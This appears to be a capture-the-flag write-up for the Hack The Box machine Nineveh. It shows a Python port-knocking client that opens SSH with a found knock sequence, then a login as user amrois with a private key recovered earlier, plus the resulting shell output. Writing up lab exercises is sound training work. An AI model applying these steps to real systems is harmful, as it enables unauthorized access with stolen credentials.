InfoSec LAB

Nineveh_Lateral_Movement

Created: 2 min read

Amrois

Now that I know the 3 ports sequence, I need to open those ports by knocking them

Knockd Python Client

import argparse
import socket
import time
 
 
def knock(host, knock_seq, delay, protocol):
 
    for port in knock_seq:
        if protocol == 'tcp':
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        else:
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 
        sock.setblocking(False)
 
        try:
            sock.connect((host, port))
        except socket.error:
            pass
        time.sleep(delay)
 
def main():
    parser = argparse.ArgumentParser(prog='knocker', description=knock.__doc__)
    parser.add_argument('host', help='Hostname or IP address of the host')
    parser.add_argument('ports', nargs='+', type=int, help='Ports to knock (Space as seperator)')
    parser.add_argument('-d', '--delay', type=int, default=200,
                        help='Milliseconds between each knock')
    parser.add_argument('-p', '--protocol',choices=['tcp', 'udp'], default='tcp')
 
    args = parser.parse_args()
 
    print('Knocking...')
    knock(args.host, args.ports, args.delay/1000, args.protocol)
 
main()

For that, I used this very simple Knockd client.

┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ python3 knocker.py $IP 571 290 911 
Knocking...
 
┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ nmap $IP -p22                  
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-17 01:33 CET
Nmap scan report for 10.10.10.43
Host is up (0.031s latency).
 
PORT   STATE SERVICE
22/tcp open  ssh
 
Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds

Target port 22 is now open and listening

I can just hop right on to SSH client with the private key that I got earlier from the image

SSH

┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ ssh amrois@$IP -i id_rsa.amrois 
The authenticity of host '10.10.10.43 (10.10.10.43)' can't be established.
ed25519 key fingerprint is sha256:kxSpgxC8gaU9OypTJXFLmc/2HKEmnDMIjzkkUiGLyuI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
warning: Permanently added '10.10.10.43' (ED25519) to the list of known hosts.
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * documentation:  https://help.ubuntu.com
 * management:     https://landscape.canonical.com
 * support:        https://ubuntu.com/advantage

288 packages can be updated.
207 updates are security updates.


You have mail.
last login: Mon Jul  3 00:19:59 2017 from 192.168.0.14
amrois@nineveh:~$ whoami
amrois
amrois@nineveh:~$ hostname
nineveh
amrois@nineveh:~$ ifconfig
ens160    link encap:Ethernet  HWaddr 00:50:56:b9:17:ee  
          inet addr:10.10.10.43  Bcast:10.10.10.255  Mask:255.255.255.0
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:539 errors:0 dropped:0 overruns:0 frame:0
          tx packets:726 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:63600 (63.6 KB)  TX bytes:109615 (109.6 KB)

lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          up loopback running  mtu:65536  Metric:1
          rx packets:160 errors:0 dropped:0 overruns:0 frame:0
          tx packets:160 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          rx bytes:11840 (11.8 KB)  TX bytes:11840 (11.8 KB)

Lateral Movement to the amrois user via SSH

Interactive Graph View

Backlinks